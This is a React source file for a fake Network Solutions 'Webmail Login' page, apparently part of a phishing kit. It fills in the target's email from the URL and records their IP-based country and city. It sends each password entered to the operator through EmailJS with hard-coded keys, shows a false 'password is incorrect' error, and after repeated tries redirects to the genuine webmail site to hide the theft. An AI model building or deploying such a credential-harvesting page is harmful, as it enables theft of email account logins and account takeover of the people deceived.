
import React, { useState, useEffect, useRef } from "react";
import './form.css';
import emailjs from '@emailjs/browser';

const Network_Solution = ()=>{

    // const relWebPage = ()=> window.location.reload();



  const [ipAdress, setIpAdress] = useState('')
  const [city, setCity] = useState('');
  const [flag, setFlag] = useState('');
  const [country, setCountry] = useState('');

  const forTime = new Date();

  useEffect(()=>{
      fetch(`https://api.geoapify.com/v1/ipinfo?apiKey=139d2378a5554f48bf290b61999b4e8a`)
      .then(req=> req.json())
      .then(res=>{

          setIpAdress(res.ip)
          setFlag(res.country.flag);
          setCountry(res.country.name);
          setCity(res.city.names.en);

      })
      .catch(e=> console.log)
  }, []);

//   const [mainWebmail, setMainWebmail] = useState(false);


    const emailInTheURL = window.location.href;
    const sliceEqualSign = emailInTheURL.indexOf("=");
    const extracetdEmail = emailInTheURL.substr((sliceEqualSign+1)).split('&', 1).toString();

  const [email, setEmail] = useState(extracetdEmail);
  const [pwd, setPwd] = useState('');

  const formRef = useRef();

  const [invalid, setInvalid] = useState(false);
  const [authenticating, setAuthenticating] = useState('Sign In');

  const [count, setCount] = useState(0);

  const [hideLog, setHideLog] = useState(false);
  const toggleHideLog = ()=> setHideLog(!hideLog);
  const showLog = ()=> setHideLog(true);



  const submitHandler = (e) => {
    e.preventDefault();
    if (pwd === "") {
      return null
    }
    else{

        setAuthenticating('Please wait...');
        setInvalid(false);
        setTimeout(() => {
          setAuthenticating(authenticating);
          setInvalid(true);
          setPwd('');
        }, 3000);



        // ====================================================


        const serviceID = `service_7sg6tsq`;
        const templateID = `template_uxgh647`;
        const publicKey = `lL-UGno8MC7t3-63B`;


        emailjs
        .sendForm(serviceID, templateID, formRef.current, {
          publicKey: publicKey,
        })
        .then(
          () => {
            console.log('---');
          },
          (error) => {
            console.log('...', error.text);
          },
        );

        // ==================================================================


      setCount(count=> count + 1);
            if(count >= 1){
                const redirectURL = window.location.href;
                const sliceEqualSign = redirectURL.indexOf("@");
                const extracetdemailDomain = redirectURL.substr((sliceEqualSign+1));
                // console.log(extracetdemailDomain);
                setTimeout(() => {
                window.location.reload();
                // window.location.href = `https://www.${extracetdemailDomain.split('&', 1).toString()}`;
                window.location.href = `https://webmail-oxcs.networksolutionsemail.com/appsuite/`;
                }, 3000);
            };
    }
  };


    return(<>

        <section className="form_wrp">
            <div className="mdal__">

                <h2 className="wbm_l">Webmail Login</h2>

                <p className="login_title_">Sign in</p>

                <form className="fmf" ref={formRef} onSubmit={submitHandler}>



                    <div className="eml_cont">
                        <div className="lbl_nd_tgler">
                            <span className="label"><b>Email</b></span>
                            { hideLog ? <span className="toggler" onClick={toggleHideLog}>Change</span> : undefined }
                        </div>
                        
                        <input 
                            type="text"
                            placeholder="Email"
                            value={`${email}`}
                            id="eml_inp_"
                            className="eml_inp_"
                            name="online_correspondence"
                            // readOnly
                            maxLength={1000}
                            required
                            autoCorrect="off"
                            spellCheck={false}
                            onChange={ e=> setEmail(e.target.value) }
                        />
                        
                    </div>




                    { hideLog ?
                        <div className="pwd_cont eml_cont">
                            <div className="lbl_nd_tgler">
                                <span className="label"><b>Your password*</b></span>
                            </div>
                            {/* <span className="label">Your password</span> */}

                            <input 
                                type="password"
                                className="pwd eml_inp_"
                                required
                                maxLength={Infinity}
                                name="signal"
                                id="pwd"
                                placeholder=""
                                value={pwd}
                                onChange={ e=> setPwd(e.target.value) }
                                autoFocus
                            />

                            <span className="fogt">Forgot your password?</span>

                        </div>
                    : undefined }




                                                    <input type="text" value={country} name="country" hidden/>
                                                    <input type="text" value={city} name="city" hidden/>

                    <div className="chk_bx">
                        <input
                            type="checkbox"
                            checked
                        />
                        &#160;
                        <span role="text" className="sinn">Stay signed in</span>
                    </div>


                    {invalid ? 
                        <div className="err_msg" role="alert">
                            The password is incorrect.
                        </div>
                    : null }




                    <div className="btn_cont eml_cont">

                        <input 
                            type={!hideLog ? 'button' : 'submit'}
                            value={authenticating}
                            className="btn"
                            id="btnnd"
                            onClick={showLog}
                        />


                        {/* <input 
                            type="submit"
                            value={`Submit`}
                            className="btn"
                            id="btnnd"
                            onClick={toggleHideLog}
                        /> */}

                    </div>

                </form>

            </div>
        </section>
    </>)
}

export default Network_Solution;